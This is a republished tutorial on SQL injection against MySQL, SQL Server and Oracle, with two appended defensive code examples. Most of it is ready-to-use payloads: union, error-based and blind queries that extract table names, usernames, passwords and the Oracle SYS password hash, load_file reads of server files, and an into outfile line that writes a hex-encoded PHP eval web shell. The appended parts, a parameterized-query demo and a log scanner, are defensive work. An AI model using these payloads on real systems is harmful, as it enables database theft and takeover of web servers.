
What is the method of quick check of SQL injection

2025-03-04 Update From: SLTechnology News&Howtos


Shulou(Shulou.com)05/31 Report--

This article explains the method of quickly checking for SQL injection. Interested readers may wish to take a look: the method introduced here is simple, fast and practical, so let the editor walk you through it.

0x01 MySQL

MySQL is distinguished by privilege (root versus an ordinary user) and by version (above or below 5.0). Whether the current account has root-level access can be checked by reading mysql.user: and (select count(file_priv) from mysql.user)>0 #

A. load_file(): this function reads a file from the server and can only read web files given by their absolute path.

Note on path separators: a single "\" fails, while "\\" and "/" both work; alternatively convert the path to hexadecimal, in which case no quotes are used.

Used in a union select, the function takes the physical path of the file, which may also be written in hexadecimal: load_file('/var/www/index.php')

It can be used to read the database connection file and so obtain the database account, password and similar details.

?id=1' and 1=2 union select 1,load_file('D:\\wamp\\www\\111.php') %23
?id=1' and 1=2 union select 1,load_file(0x443A2F77616D702F7777772F312E706870) %23

B. into outfile

Conditions: 1. the absolute path is known; 2. single quotation marks can be used.

?id=1 union select 1,"",3 into outfile 'EVERVIL.php'
?id=1 LIMIT 0,1 into outfile 'EVERVIL.php' lines terminated by 0x20273c3f70687020406576616c28245f504f53545b2767275d293b3f3e27--

1.2 MySQL union query

1.2.1 MySQL versions below 5.0

1. Determine whether injection is possible: ?id=1 and 1=1 returns the normal page; ?id=1 and 1=2 returns a blank page.
2. Get the number of fields with order by, for example: ?id=1 order by 4 displays normally and ?id=1 order by 5 errors, indicating that the number of fields is 4.
3. Get the display bits: ?id=1 and 1=2 union select 1,2,3,4; the numbers that appear on the page are called the display bits.
4. Guess the table name by appending from <table> to the complete statement of step 3, for example: ?id=1 and 1=2 union select 1,2,3,4 from users. When the users table exists the page displays normally; a table name that does not exist produces an error.
5. Guess the fields by replacing a display bit with concat(field name): ?id=1 and 1=2 union select 1,2,3,concat(username,password) from users

1.2.2 MySQL 5.0 and above (table and column lookup via information_schema)

1. Determine whether injection is possible: and+1=1 returns the normal page; and+1=2 returns a blank page.
2. Get the number of fields with order by: ?id=1 order by 4 is correct and ?id=1 order by 5 errors, so the number of fields is 4.
3. Get the display bits: ?id=1+and+1=2+union+select+1,2,3,4; the display bits are 2, 3 and 4.
4. Get information: ?id=1+and+1=2+union+select+1,version(),database(),user(); @@basedir gives the database installation path and @@datadir the data directory.
5. Look up the tables: ?id=1 and 1=2 union select 1,table_name,3,4 from information_schema.tables where table_schema=0x74657374 limit 0,1 (0x74657374 is the hex of the database name test); this yields the table test.
6. Look up the fields: ?id=1 and 1=2 union select 1,column_name,3,4 from information_schema.columns where table_name=0x74657374 limit 0,1; stepping the limit yields the fields id, username, password.
7. Dump the field contents: ?id=1+and+1=2+union+select+1,2,3,concat(username,password) from+test
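Added defensive example, not from the original article: the step-1 probe pair in 1.2.1 and 1.2.2 only produces two different pages when the id value is spliced into the SQL text; against a bound parameter both probes return the same (empty) result, which is the check to run on your own code. Python's sqlite3 stands in for MySQL here, and the news table with its two rows is constructed.

```python
import sqlite3

def make_db():
    """Constructed stand-in for a news table queried as /news.php?id=<n>."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER, title TEXT)")
    conn.executemany("INSERT INTO news VALUES (?, ?)", [(1, "first"), (2, "second")])
    return conn

def vulnerable_lookup(conn, raw_id):
    """The id value is spliced into the SQL text, so 'and 1=1' / 'and 1=2' become part of the WHERE clause."""
    return conn.execute("SELECT id, title FROM news WHERE id = " + raw_id).fetchall()

def safe_lookup(conn, raw_id):
    """The id value is bound as a parameter: it is compared as data and never parsed as SQL."""
    return conn.execute("SELECT id, title FROM news WHERE id = ?", (raw_id,)).fetchall()

def differential(lookup, conn, base="1"):
    """Apply the article's step-1 probe pair and report whether the two responses differ."""
    true_rows = lookup(conn, base + " and 1=1")
    false_rows = lookup(conn, base + " and 1=2")
    return true_rows, false_rows, true_rows != false_rows

if __name__ == "__main__":
    conn = make_db()
    for name, fn in (("concatenated", vulnerable_lookup), ("parameterized", safe_lookup)):
        t, f, differs = differential(fn, conn)
        print(f"{name}: and 1=1 -> {t}, and 1=2 -> {f}, injectable={differs}")
```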

1.3 MySQL error injection

A collection of MySQL error-based injection methods: floor, UpdateXml, ExtractValue, NAME_CONST, error-based double query injection and others.

A variety of error injection methods:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));
and extractvalue(1,concat(0x5c,(select version() from information_schema.tables limit 1)));
and 1=(updatexml(1,concat(0x3a,(select user())),1));
and GeometryCollection((select * from (select @@version)f)x);
and polygon((select * from (select name_const(version(),1))x));
and linestring((select * from (select * from (select user())a)b));
and multilinestring((select * from (select * from (select version())a)b));
and multipoint((select * from (select * from (select user())a)b));
and multipolygon((select * from (select * from (select user())a)b));
and exp(~(select * from (select version())a));

1.4 MySQL blind injection

Boolean-based injection

id=1 and (select length(user()))=20 # returns the normal page when the user name is 20 characters long
id=1 and ascii(substring((SELECT username FROM users limit 0,1),1,1))=97 // compares the ASCII value of the first character of the first username

Time-based injection

1 xor (if(ascii(mid(user() from 1 for 1))=114,sleep(5),0))
1 xor if(ascii(substr(user(),1,1)) like 114,benchmark(1000000,md5('1')),'2')

0x02 SQL Server

SA permissions: database operation, file management, command execution, registry reading, etc.

Db permissions: file management, database operation, etc.

Public permissions: database operation

2.1 SQL Server union query

1. Determine whether there is an injection: ?id=1 and 1=1 -- returns correctly; ?id=1 and 1=2 -- returns an error.
2. Get the number of fields: ?id=1 order by 2 -- returns the correct page; ?id=1 order by 3 -- returns an error page, so there are 2 fields.
3. Get the current database: ?id=1 and 1=2 union select db_name(),null
4. View the table names: ?id=1 and 1=2 union select top 1 TABLE_NAME,2 from INFORMATION_SCHEMA.TABLES where table_name not in ('users')
5. View the column names: ?id=1 and 1=2 union select top 1 column_name,2 from information_schema.columns where table_name='users' and column_name not in ('uname')
6. Get the data: ?id=1 and 1=2 union select top 1 uname,null from users

2.2 SQL Server error injection

1. Get the table name: ?id=4' and 1>(select top 1 TABLE_NAME from INFORMATION_SCHEMA.TABLES where TABLE_NAME not in ('admin'))--
2. Get the column name: ?id=4' and 1>(select top 1 COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME='admin' and column_name not in ('id'))--
3. Get the data: ?id=4' and 1=(select top 1 pwd from admin)--
4. Get database information: ?id=1' and 1=(select @@version)-- // SQL Server 2000; ?id=1' and 1=(select db_name())-- // currently used database

2.3 SQL Server blind injection

1. Guess the table name:
?id=1 and (select count(*) from sysobjects where name in (select top 1 name from sysobjects where xtype='u') and len(name)=7)=1-- // the first table name has length 7
?id=1 and (select count(*) from sysobjects where name in (select top 1 name from sysobjects where xtype='u') and ascii(substring(name,1,1))>115)=1-- // guess the first ASCII value of the first table
?id=1 and (select count(*) from sysobjects where name in (select top 1 name from sysobjects where xtype='u' and name not in ('users')) and ascii(substring(name,1,1))>115)=1-- // guess the first ASCII value of the second table; once the table name is known, go on to guess the fields
2. Guess the fields:
id=1 and (select count(*) from syscolumns where name in (select top 1 name from syscolumns where id=(select id from sysobjects where name='users')) and ascii(substring(name,1,1))>90)=1-- // first ASCII value of the first field of the users table
id=1 and (select count(*) from syscolumns where name in (select top 1 name from syscolumns where id=(select id from sysobjects where name='users')) and name not in ('upass') and ascii(substring(name,1,1))>90)=1-- // first ASCII value of the second field of the users table
3. Guess the data:
id=1 and ascii(substring((select top 1 uname from users),1,1))=33-- // first ASCII value of the uname field in the users table

0x03 Oracle

3.1 Union query

Union select null,null,null: start with a single null and keep adding ',null' until the query returns correctly, which gives the display bits.
Union select null,null,null from dual returns correctly: the dual table exists.
Union Select tablespace_name from user_tablespaces // look up the database
Union Select table_name from user_tables where rownum=1 and table_name<>'news' // look up the tables
Union Select column_name from user_tab_columns where table_name='users' // look up the columns
?id=1 order by 1 // obtain the number of fields
and+1=1+union+all+select+(SELECT banner FROM v$version where rownum=1)+from+dual-- // get the database version
and+1=1+union+all+select+(select user from dual where rownum=1)+from+dual-- // get the user name
union+all+select+(select password from sys.user$ where rownum=1 and name='SYS')+from+dual-- // get the SYS user's password hash
union+all+select+(SELECT name FROM v$database)+from+dual-- // get the database name
and+1=1+union+all+select+(select table_name from user_tables where rownum=1)+from+dual-- // get the first table name

3.2 Error injection

The biggest difference is the function utl_inaddr.get_host_address, which can be called freely in 10g; 11g requires the dba privilege.
?id=1 and exists (select * from dual)-- // determine whether the database is Oracle
?id=1 and 1=utl_inaddr.get_host_address((SELECT name FROM v$database))-- // get the database name
?id=1 and 1=ctxsys.drithsx.sn(1,(select UTL_INADDR.get_host_address from dual where rownum=1))-- // get the IP of the database server
?id=1 and 1=CTXSYS.CTX_QUERY.CHK_XPATH((select banner from v$version where rownum=1),'a','b')--
?id=1 or 1=ORDSYS.ORD_DICOM.GETMAPPINGXPATH((select banner from v$version where rownum=1),'a','b')--
?id=1 and (select dbms_xdb_version.uncheckout((select user from dual)) from dual) is not null--
?id=1 and 1=ctxsys.drithsx.sn(1,(select user from dual))--

3.3 Blind injection

Boolean-based blind injection:

?id=7782' and length((SELECT name FROM v$database))=4-- // get the length of the database name
?id=7782' and ascii(substr((SELECT name FROM v$database),1,1))=79-- // the first character of the database name is O

Time-delay-based blind injection:

?id=7782' and 1=(CASE WHEN (ascii(substr((SELECT name FROM v$database),1,1))=79) THEN 1 ELSE 2 END)--
?id=7782' AND 1=(CASE WHEN (ascii(substr((SELECT name FROM v$database),1,1))=79) THEN DBMS_PIPE.RECEIVE_MESSAGE(CHR||CHR(102),5) ELSE 1 END)--

By now you should have a better understanding of the method of quickly checking for SQL injection. You might as well try it in practice. More related content can be found in the relevant channels of this website; follow us and keep learning!
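Added defensive example, not from the original article: every technique family above leaves a recognisable token in the request (load_file / into outfile, the error-raising functions, sleep / benchmark / DBMS_PIPE, catalog names such as information_schema, sysobjects or v$database, union select, and ascii / length / substr comparisons). This scanner URL-decodes the request path of each access-log line and tags it with the families it matches across the MySQL, SQL Server and Oracle sections. The log format, the news.php path and the sample lines (documentation-range IP) are constructed.

```python
import re
from urllib.parse import unquote_plus

# Indicator families in the order the article presents them; each regex is
# applied to the URL-decoded query string of a request.
INDICATORS = [
    ("file-access",   re.compile(r"load_file\s*\(|into\s+outfile", re.I)),
    ("error-based",   re.compile(r"extractvalue\s*\(|updatexml\s*\(|name_const\s*\(|floor\s*\(\s*rand|exp\s*\(\s*~|utl_inaddr\.get_host_address|ctxsys\.drithsx\.sn", re.I)),
    ("time-based",    re.compile(r"\b(?:sleep|benchmark|dbms_pipe\.receive_message)\s*\(", re.I)),
    ("schema-probe",  re.compile(r"information_schema\.|\bsys(?:objects|columns)\b|user_tab(?:les|_columns)\b|v\$(?:database|version)", re.I)),
    ("union",         re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("boolean-blind", re.compile(r"\b(?:ascii|length|substr(?:ing)?)\s*\(.+\)\s*[=<>]\s*\d+", re.I)),
]

# Combined-log style request line; only the client address and request path are used.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP')

def classify(query):
    """Return the indicator families present in a URL-encoded query string."""
    decoded = unquote_plus(query)
    return [name for name, rx in INDICATORS if rx.search(decoded)]

def scan(log_lines):
    """Return (client_ip, path, families) for every request carrying at least one indicator."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, path = m.groups()
        families = classify(path)
        if families:
            hits.append((ip, path, families))
    return hits

# Constructed sample log: one benign request, then probes in the shapes shown above.
SAMPLE_LOG = [
    '203.0.113.5 - - [04/Mar/2025:10:00:01 +0000] "GET /news.php?id=1 HTTP/1.1" 200 512',
    '203.0.113.5 - - [04/Mar/2025:10:00:02 +0000] "GET /news.php?id=1+and+1=2+union+select+1,2,3,version() HTTP/1.1" 200 498',
    '203.0.113.5 - - [04/Mar/2025:10:00:03 +0000] "GET /news.php?id=1%27+and+ascii(substring((SELECT+username+FROM+users+limit+0,1),1,1))=97%23 HTTP/1.1" 200 512',
    '203.0.113.5 - - [04/Mar/2025:10:00:04 +0000] "GET /news.php?id=1+and+(select+1+from+(select+count(*),concat(version(),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a) HTTP/1.1" 500 211',
    '203.0.113.5 - - [04/Mar/2025:10:00:05 +0000] "GET /news.php?id=1+xor+if(ascii(mid(user()+from+1+for+1))=114,sleep(5),0) HTTP/1.1" 200 512',
    '203.0.113.5 - - [04/Mar/2025:10:00:11 +0000] "GET /news.php?id=7782%27+and+1=(CASE+WHEN+(ascii(substr((SELECT+name+FROM+v$database),1,1))=79)+THEN+DBMS_PIPE.RECEIVE_MESSAGE(CHR(98),5)+ELSE+1+END)-- HTTP/1.1" 200 512',
    '203.0.113.5 - - [04/Mar/2025:10:00:12 +0000] "GET /news.php?id=1+union+select+1,load_file(0x443A2F77616D702F7777772F312E706870),3%23 HTTP/1.1" 200 640',
]

if __name__ == "__main__":
    for ip, path, families in scan(SAMPLE_LOG):
        print(ip, ",".join(families), unquote_plus(path))
```

The same client emitting both an "and 1=1" and an "and 1=2" request within seconds is the boolean probe pair from step 1 of each section; a simple per-client count of tagged requests over a short window turns these per-line tags into an alert.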
